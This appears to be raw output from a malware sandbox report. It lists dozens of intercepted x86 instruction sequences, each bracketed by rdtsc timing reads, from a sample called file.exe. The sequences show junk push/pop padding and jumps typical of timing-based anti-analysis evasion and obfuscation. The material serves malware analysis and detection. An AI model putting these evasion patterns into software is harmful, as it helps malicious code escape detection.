Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9232 second address: BB924F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FE420CEA00Ch 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FE420CEA006h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB924F second address: BB926E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE4211E2ABAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93BC second address: BB93C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93C0 second address: BB93D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93D0 second address: BB93F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE420CEA014h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE420CEA00Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB93F9 second address: BB93FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9556 second address: BB955C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB955C second address: BB9578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE4211E2AB6h 0x0000000a popad 0x0000000b jns 00007FE4211E2ABEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9578 second address: BB9581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9581 second address: BB9596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2AC1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9723 second address: BB973E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE420CEA00Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB973E second address: BB9742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9742 second address: BB9752 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE420CEA006h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BB9752 second address: BB9756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD42B second address: BBD430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD430 second address: BBD47A instructions: 0x00000000 rdtsc 0x00000002 js 00007FE4211E2ABCh 0x00000008 jno 00007FE4211E2AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 pushad 0x00000013 jmp 00007FE4211E2AC3h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pop edi 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007FE4211E2AC4h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD47A second address: BBD484 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE420CEA006h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD513 second address: BBD51A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD51A second address: BBD533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FE420CEA00Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD533 second address: BBD5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 stc 0x00000008 push 00000000h 0x0000000a mov dword ptr [ebp+122D330Ah], eax 0x00000010 call 00007FE4211E2AC4h 0x00000015 push edx 0x00000016 sub dword ptr [ebp+122D23C1h], edi 0x0000001c pop ecx 0x0000001d pop ecx 0x0000001e call 00007FE4211E2AB9h 0x00000023 jmp 00007FE4211E2AC0h 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007FE4211E2AC2h 0x0000002f jmp 00007FE4211E2ABAh 0x00000034 popad 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD5A0 second address: BBD5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edi 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD5B2 second address: BBD628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2ABCh 0x00000009 popad 0x0000000a pop edi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007FE4211E2AC4h 0x00000015 pop eax 0x00000016 mov esi, ebx 0x00000018 push 00000003h 0x0000001a or di, 20C8h 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D345Dh] 0x00000027 push 00000003h 0x00000029 push 6F3F7275h 0x0000002e jbe 00007FE4211E2AC9h 0x00000034 jmp 00007FE4211E2AC3h 0x00000039 add dword ptr [esp], 50C08D8Bh 0x00000040 mov dx, 8184h 0x00000044 lea ebx, dword ptr [ebp+12452350h] 0x0000004a mov esi, edi 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD628 second address: BBD62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD62C second address: BBD630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD630 second address: BBD636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD865 second address: BBD916 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE4211E2ACCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 6AD48A29h 0x00000011 or dword ptr [ebp+122D2A79h], eax 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FE4211E2AB8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov ecx, dword ptr [ebp+122D3451h] 0x00000039 mov dword ptr [ebp+122D330Ah], eax 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FE4211E2AB8h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b add dx, E134h 0x00000060 adc edx, 65177127h 0x00000066 push 00000003h 0x00000068 sub edx, dword ptr [ebp+122D1C29h] 0x0000006e mov edx, dword ptr [ebp+122D333Dh] 0x00000074 call 00007FE4211E2AB9h 0x00000079 pushad 0x0000007a jmp 00007FE4211E2ABAh 0x0000007f push eax 0x00000080 push edx 0x00000081 jp 00007FE4211E2AB6h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD916 second address: BBD91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD91A second address: BBD947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jns 00007FE4211E2AB6h 0x00000010 jns 00007FE4211E2AB6h 0x00000016 popad 0x00000017 pop esi 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FE4211E2ABFh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD947 second address: BBD957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA00Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD957 second address: BBD95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD95B second address: BBD978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FE420CEA011h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD978 second address: BBD97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD97E second address: BBD982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD982 second address: BBD986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD986 second address: BBD99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FE420CEA008h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD99C second address: BBD9BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b and esi, 4BBC7528h 0x00000011 lea ebx, dword ptr [ebp+12452364h] 0x00000017 mov di, cx 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9BE second address: BBD9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9C3 second address: BBD9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9C9 second address: BBD9CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BBD9CD second address: BBD9EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE4211E2AC7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4D4 second address: BDC4D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4D9 second address: BDC4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4E1 second address: BDC4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE420CEA006h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4F0 second address: BDC4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4F4 second address: BDC4F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC4F8 second address: BDC522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE4211E2AC5h 0x0000000f pushad 0x00000010 jc 00007FE4211E2AB6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC522 second address: BDC527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA390 second address: BDA3A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4211E2AC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA3A8 second address: BDA3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA3AD second address: BDA3CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA4F0 second address: BDA4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA4F4 second address: BDA50A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE4211E2AC1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA50A second address: BDA530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jnp 00007FE420CEA00Ch 0x0000000e jnc 00007FE420CEA006h 0x00000014 jo 00007FE420CEA00Eh 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c jne 00007FE420CEA006h 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA530 second address: BDA534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA7FA second address: BDA811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA013h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA811 second address: BDA832 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FE4211E2AC0h 0x0000000e jo 00007FE4211E2AB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDA986 second address: BDA9A5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE420CEA008h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE420CEA011h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAB05 second address: BDAB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAC7A second address: BDAC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAC7E second address: BDAC82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDAF36 second address: BDAF42 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE420CEA006h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB4F0 second address: BDB4FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE4211E2ABEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC885 second address: BAC8AC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE420CEA01Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC8AC second address: BAC8B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC8B0 second address: BAC8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BAC8B6 second address: BAC8CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE4211E2AC0h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDB656 second address: BDB670 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FE420CEA014h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBD46 second address: BDBD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBD4C second address: BDBD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBD50 second address: BDBD77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC8h 0x00000007 jp 00007FE4211E2AB6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDBF27 second address: BDBF2D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BDC0B4 second address: BDC0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FE4211E2AC9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE149E second address: BE14A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7E98 second address: BE7E9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7E9D second address: BE7EC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE420CEA00Eh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE420CEA014h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE8039 second address: BE806D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE4211E2AC5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE806D second address: BE8071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE8071 second address: BE8095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007FE4211E2AC8h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE8095 second address: BE809E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE809E second address: BE80C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FE4211E2AB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAF6E second address: BEAF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEAFF1 second address: BEB00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FE4211E2AC0h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB00C second address: BEB012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB012 second address: BEB046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jl 00007FE4211E2AD4h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB046 second address: BEB077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007FE420CEA00Ch 0x0000000b jc 00007FE420CEA006h 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007FE420CEA019h 0x0000001e jmp 00007FE420CEA013h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB78D second address: BEB791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB891 second address: BEB8A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA014h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB8A9 second address: BEB8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEB8AF second address: BEB8B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBCC8 second address: BEBCCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBE4A second address: BEBE4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEBE4E second address: BEBE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEC003 second address: BEC007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
